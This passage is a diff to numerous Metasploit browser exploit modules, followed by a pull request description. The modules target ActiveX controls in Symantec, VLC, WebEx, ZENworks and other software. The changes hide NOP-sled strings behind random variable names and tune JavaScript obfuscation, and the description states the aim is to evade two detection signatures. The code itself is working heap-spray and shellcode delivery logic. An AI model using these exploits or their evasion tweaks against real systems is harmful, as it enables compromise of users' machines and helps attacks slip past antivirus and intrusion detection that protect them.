+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|
   <html>
@@ -85,7 +86,8 @@ class MetasploitModule < Msf::Exploit::Remote
     try {
       var #{vname} = new ActiveXObject('SoftArtisans.FileManager.1');
       var #{rand1} = unescape('#{shellcode}');
-      var #{rand2} = unescape('#{nops}');
+      var #{randnop} = "#{nops}";
+      var #{rand2} = unescape(#{randnop});
       var #{rand3} = 20;
       var #{rand4} = #{rand3} + #{rand1}.length;
       while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};

--- a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb
+++ b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb
@@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
     js.update_opts(js_heap_spray.opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
     content = %Q|<html>
 <body>
 <script><!--

--- a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb
+++ b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb
@@ -84,13 +84,15 @@ class MetasploitModule < Msf::Exploit::Remote
     j_ret        = rand_text_alpha(rand(100) + 1)
     j_junk       = rand_text_alpha(rand(100) + 1)
     j_filename   = rand_text_alpha(rand(16) + 1)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     # Build out the message
     content = %Q|<html>
 <object classid='clsid:22ACD16F-99EB-11D2-9BB3-00400561D975' id='#{pvcalendar}'></object>
 <script language='javascript'>
 #{j_shellcode} = unescape('#{shellcode}');
-#{j_nops} = unescape('#{nops}');
+#{randnop} = "#{nops}";
+#{j_nops} = unescape(#{randnop});
 #{j_headersize} = 20;
 #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};

--- a/modules/exploits/windows/browser/teechart_pro.rb
+++ b/modules/exploits/windows/browser/teechart_pro.rb
@@ -235,7 +235,7 @@ EOS
       #JS obfuscation on demand
       if datastore['OBFUSCATE']
         js = ::Rex::Exploitation::JSObfu.new(js)
-        js.obfuscate
+        js.obfuscate(memory_sensitive: true)
         main_sym = js.sym('main')
       end
     end

--- a/modules/exploits/windows/browser/teechart_pro.rb
+++ b/modules/exploits/windows/browser/teechart_pro.rb
@@ -140,11 +140,14 @@ class MetasploitModule < Msf::Exploit::Remote
     obj_name  = rand_text_alpha(rand(100) + 1)
     main_sym  = 'main' #main function name
 
+    randnop = rand_text_alpha(rand(100) + 1)
+
     if my_target.name =~ /IE6/ or my_target.name =~ /IE7/
       js = <<-EOS
 var sc = unescape('#{sc}');
 
-var nops = unescape('%u0c0c%u0c0c');
+var #{randnop} = "%u0c0c%u0c0c";
+var nops = unescape(#{randnop});
 var offset = 20;
 var s = offset + sc.length;
 while(nops.length < s) {

--- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
+++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
@@ -234,7 +234,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #obfuscate on demand
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     html = <<-EOS

--- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
+++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
@@ -193,6 +193,8 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
     js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
+    randnop2 = rand_text_alpha(rand(100) + 1)
 
     if my_target['Rop'].nil?
       js_shellcode = "var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);"
@@ -209,8 +211,10 @@ class MetasploitModule < Msf::Exploit::Remote
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
-    var nops_90 = unescape("#{js_90_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
+    var #{randnop2} = "#{js_90_nops}";
+    var nops_90 = unescape(#{randnop2});
 
     while (nops.length < 0x80000) nops += nops;
     while (nops_90.length < 0x80000) nops_90 += nops_90;

--- a/modules/exploits/windows/browser/trendmicro_extsetowner.rb
+++ b/modules/exploits/windows/browser/trendmicro_extsetowner.rb
@@ -109,12 +109,14 @@ class MetasploitModule < Msf::Exploit::Remote
     j_block      = rand_text_alpha(rand(100) + 1)
     j_memory     = rand_text_alpha(rand(100) + 1)
     j_counter    = rand_text_alpha(rand(30) + 2)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     html = %Q|<html>
 <object classid='clsid:#{clsid}' id='#{ufpbctrl}'></object>
 <script>
 var #{j_shellcode} = unescape('#{shellcode}');
-var #{j_nops} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{j_nops} = unescape(#{randnop});
 var #{j_headersize} = 20;
 var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};

--- a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb
+++ b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb
@@ -87,6 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Convert the pivot addr (in decimal format) to binary,
     # and then break it down to this printable format:
@@ -100,7 +101,8 @@ class MetasploitModule < Msf::Exploit::Remote
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});

--- a/modules/exploits/windows/browser/ultraoffice_httpupload.rb
+++ b/modules/exploits/windows/browser/ultraoffice_httpupload.rb
@@ -114,7 +114,7 @@ obj.HttpUpload(arg1, arg2, sploit);
       }
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
 
     # Build the final HTML
     content = %Q|<html>

--- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
+++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
@@ -174,7 +174,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Obfuscate on demand
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     # Randomize the javascript variable names

--- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
+++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
@@ -148,11 +148,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Payload in JS format
     code = Rex::Text.to_unescape(code)
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
 
     spray = <<-JS
     var heap_lib = new heapLib.ie(0x20000);
     var code = unescape("#{code}");
-    var nops = unescape("%u0c0c%u0c0c");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x2000) nops += nops;
     var offset = nops.substring(0, 0x800-0x20);

--- a/modules/exploits/windows/browser/vlc_amv.rb
+++ b/modules/exploits/windows/browser/vlc_amv.rb
@@ -206,7 +206,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #obfuscate on demand
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     #Value for the 'Src' parameter of our ActiveX control

--- a/modules/exploits/windows/browser/vlc_amv.rb
+++ b/modules/exploits/windows/browser/vlc_amv.rb
@@ -161,12 +161,14 @@ class MetasploitModule < Msf::Exploit::Remote
       code = Rex::Text.to_unescape(payload.encoded, arch)
       pivot   = Rex::Text.to_unescape([my_target['TargetAddr']].pack('V*'), arch)
     end
+    randnop = rand_text_alpha(rand(100) + 1)
 
     #First spray overwrites 0x0c0c0c0c with our payload
     spray_1 = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{code}");
-    var nops = unescape("#{nops}");
+    var #{randnop} = "#{nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x1000) nops += nops;
     var offset = nops.substring(0, 0x600-0x20);
@@ -185,7 +187,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #An invalid pointer gets passed on to libdirectx_plugin!vlc_entry_license__1_1_0g,
     #which requires us to fill up the memory as high as 0x303234ca
     spray_2 = <<-JS
-    var padding = unescape("#{nops}");
+    var padding = unescape(#{randnop});
     var pivot = unescape("#{pivot}");
 
     while (padding.length < 0x20000) padding += padding;

--- a/modules/exploits/windows/browser/vlc_mms_bof.rb
+++ b/modules/exploits/windows/browser/vlc_mms_bof.rb
@@ -152,7 +152,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #obfuscate on demand
     if datastore['OBFUSCATE']
       js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
-      js_spray.obfuscate
+      js_spray.obfuscate(memory_sensitive: true)
     end
 
 

--- a/modules/exploits/windows/browser/vlc_mms_bof.rb
+++ b/modules/exploits/windows/browser/vlc_mms_bof.rb
@@ -126,12 +126,14 @@ class MetasploitModule < Msf::Exploit::Remote
     arch = Rex::Arch.endian(my_target.arch)
     nops = Rex::Text.to_unescape("\x0c\x0c\x0c\x0c", arch)
     code = Rex::Text.to_unescape(payload.encoded, arch)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Spray overwrites 0x30303030 with our payload
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{code}");
-    var nops = unescape("#{nops}");
+    var #{randnop} = "#{nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['OffsetShell']});

--- a/modules/exploits/windows/browser/webex_ucf_newobject.rb
+++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb
@@ -123,7 +123,7 @@ obj.NewObject(sploit);
       }
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
 
     # Build the final HTML
     content = %Q|<html>

--- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
+++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
@@ -143,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     html = <<-EOS


### PR DESCRIPTION
This changeset focuses on 2 signatures:
* Detecting a direct unescape call of nop bytes e.g. `unescape("%u0c0c%u0c0c")`
* Building a payload with by calling `String.fromCharCode()`

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploits/windows/browser/adobe_flash_mp4_cprt`
- [ ] set OBFUSCATE true
- [ ] **Verify** there is no `unescape("<bytes">)` but instead sets the bytes to a random variable and calls `unescape` on the variable
- [ ] `use `exploits/windows/browser/adobe_flash_sps`
- [ ] set OBFUSCATE true
- [ ] **Verify** there is no call to String.fromCharCode()

